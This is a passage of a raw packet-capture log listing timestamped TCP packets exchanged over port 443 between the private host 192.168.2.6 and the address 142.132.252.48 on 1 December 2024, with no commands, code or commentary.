                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.287017107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.287033081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.287095070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.287101030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.287161112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.292737007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.292757034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.292804003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.292810917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.292853117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.292853117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.297878027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.297894955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.297970057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.297970057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.297980070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.298054934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.303309917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.303332090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.303411007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.303419113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.303455114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.303493023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.355952024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.466093063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.466124058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.466181040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.466190100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.466213942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.466250896 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.471932888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.471950054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.472002983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.472007990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.472045898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.472080946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.477633953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.477649927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.477749109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.477760077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.477849007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.482652903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.482670069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.482728958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.482736111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.482754946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.482789040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.488253117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.488267899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.488362074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.488362074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.488369942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.488403082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.493974924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.493989944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.494041920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.494055986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.494067907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.494116068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.498999119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.499016047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.499057055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.499063015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.499102116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.499102116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.504862070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.504878044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.504930019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.504936934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.504976988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.504995108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.631958008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.667412043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.667448997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.667537928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.667546034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.667557001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.667589903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.673260927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.673279047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.673348904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.673356056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.673408031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.678845882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.678865910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.678936958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.678945065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.679002047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.684137106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.684154987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.684216022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.684223890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.684266090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.689407110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.689423084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.689475060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.689481020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.689519882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.695101023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.695116997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.695174932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.695188046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.695251942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.700084925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.700102091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.700165987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.700171947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.700223923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.705873966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.705889940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.705970049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.705981016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.706054926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.732947111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.869045973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.869067907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.869249105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.869257927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.869316101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.874680996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.874697924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.874759912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.874767065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.874811888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.879719973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.879735947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.879798889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.879811049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.879836082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.879867077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.885382891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.885397911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.885488033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.885495901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.885536909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.891042948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.891057968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.891130924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.891139030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.891186953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.896136999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.896152973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.896204948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.896210909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.896235943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.896290064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.901740074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.901756048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.901824951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.901824951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.901834011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.901892900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.907332897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.907349110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.907407045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.907413006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.907469988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.924571991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.070633888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.070662022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.070728064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.070736885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.070769072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.070787907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.076179028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.076204062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.076251984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.076257944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.076303005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.076303005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.076724052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.081078053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.081095934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.081193924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.081202030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.081252098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.086904049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.086920977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.086981058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.086988926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.087053061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.092390060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.092406034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.092483997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.092497110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.092571020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.097637892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.097654104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.097738028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.097744942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.097824097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.101900101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.103137016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.103152990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.103220940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.103228092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.103276968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.108715057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.108730078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.108772039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.108779907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.108808994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.108808994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.201719999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.272063971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.272094965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.272289991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.272300005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.272345066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.277586937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.277604103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.277704954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.277714968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.277761936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.282495975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.282514095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.282565117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.282578945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.282608032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.282608032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.288225889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.288243055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.288307905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.288322926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.288403988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.291754961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.293786049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.293803930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.293855906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.293862104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.293873072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.293898106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.296840906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.299542904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.299559116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.299607992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.299616098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.299655914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.304500103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.304521084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.304575920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.304589987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.304626942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.304626942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.308608055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.310137033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.310153008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.310216904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.310223103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.310272932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.332978010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.473356962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.473376989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.473577023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.473597050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.473651886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.478645086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.478677988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.478713989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.478719950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.478766918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.478766918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.484213114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.484227896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.484297037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.484304905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.486951113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.490175962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.490191936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.490257025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.490264893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.490556955 CET49721443192.168.2.6142.132.252.48
